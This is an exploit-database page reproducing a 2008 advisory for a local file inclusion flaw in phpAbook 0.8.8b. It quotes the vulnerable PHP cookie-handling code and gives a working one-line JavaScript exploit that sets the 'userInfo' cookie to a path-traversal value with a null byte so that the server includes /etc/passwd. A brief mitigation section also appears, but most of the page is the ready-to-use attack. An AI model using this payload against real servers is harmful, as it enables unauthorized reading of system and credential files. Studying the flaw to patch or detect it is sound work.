phpAbook - exploit.company

vendor:

phpAbook

by:

JosS

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: phpAbook

Affected Version From: 0.8.8b

Affected Version To: 0.8.8b

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2008

phpAbook <= 0.8.8b (COOKIE) Local File Inclusion Vulnerability

This exploit targets the phpAbook version 0.8.8b and takes advantage of a local file inclusion vulnerability. By manipulating the 'userInfo' cookie, an attacker can include arbitrary files on the server, potentially accessing sensitive information. The exploit code is provided as a JavaScript snippet that sets the 'userInfo' cookie to include the path to the '/etc/passwd' file.

Mitigation:

To mitigate this vulnerability, it is recommended to update phpAbook to a version that includes a patch for this issue. Additionally, ensuring that the 'magic_quotes_gpc' setting is set to 'On' can provide some level of protection against this type of attack.

Source

Exploit-DB raw data:

# phpAbook <= 0.8.8b (COOKIE) Local File Inclusion Vulnerability
# url: http://sourceforge.net/projects/phpabook/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# *Requirements: magic_quotes_gpc = Off

vuln file: include/config.inc.php
vuln code:

x:  >...
61: if (isset($HTTP_COOKIE_VARS["userInfo"]) && $HTTP_COOKIE_VARS["userInfo"] != "") {
	$userArray = explode(" ", $HTTP_COOKIE_VARS["userInfo"]);
	$userName = $userArray[0];
	$userID = $userArray[1];
	$userLang = $userArray[2];
	include("include/lang/$userLang/inc.messages.php");
67:	}
x:  <...

Proof of Concept (function 'explode' PHP):
[0] = JosS;
[1] = JosS;
[2] = ../../../../etc/passwd%00; ---> INCLUDE

exploit: 
javascript:document.cookie="userInfo=JosS JosS ../../../../etc/passwd%00; path=/";

Ingenious work :D

# milw0rm.com [2008-10-05]